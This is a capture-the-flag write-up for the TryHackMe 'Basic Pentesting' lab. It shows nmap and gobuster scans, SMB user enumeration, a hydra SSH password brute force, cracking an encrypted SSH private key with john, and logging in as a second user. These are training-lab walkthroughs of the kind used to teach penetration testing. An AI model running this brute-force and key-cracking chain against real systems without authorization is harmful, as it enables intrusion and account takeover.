Tryhackme Basic Pentesting Writeup

Let’s start with nmap scanning first

Command: nmap -vv -sCV 10.10.202.36

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
| 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
139/tcp open netbios-ssn syn-ack Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We will do a directory scan to find the hidden file on the web server.

Command: gobuster dir -u http://10.10.202.36 -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.202.36
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/27 06:37:20 Starting gobuster
===============================================================
/development (Status: 301)
/server-status (Status: 403)
===============================================================
2021/02/27 06:41:05 Finished
===============================================================

Let’s visit the directory we found

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K

As far as we understand from the texts given, it has 2 users inside and gives us information about SMB.

Command: enum4linux -a 10.10.202.36

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\k** (Local User)
S-1-22-1-1001 Unix User\j** (Local User)

Kay and jan now have user names. We can start the brute force attack

Command: hydra -l j** -P /home/hakanbey/Desktop/rockyou.txt ssh://10.10.202.36

[22][ssh] host: 10.10.202.36   login: j**   password: ar*****
1 of 1 target successfully completed, 1 valid password found

Okey, let’s go to ssh

Command: ssh j**@10.10.202.36

When we look at the files of the user named kay to increase the authority, we can read the “id_rsa” file in the “.ssh” folder. However, it has been ENCRYPTED. We have to break with John.

Command: /usr/share/john/ssh2john.py id_rsa > hash

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
be*****          (id_rsa)
1g 0:00:00:03 DONE (2021-02-27 07:22) 0.3125g/s 4481Kp/s 4481Kc/s 4481KC/s     angelica..Congo
Session completed

Now we can establish ssh connection using id_rsa key

Command: chmod 600 id_rsa && ssh -i id_rsa kay@10.10.202.36

We can now read the pass.bak file

heresare************************************wordpolicy$$

Thank you for reading and solving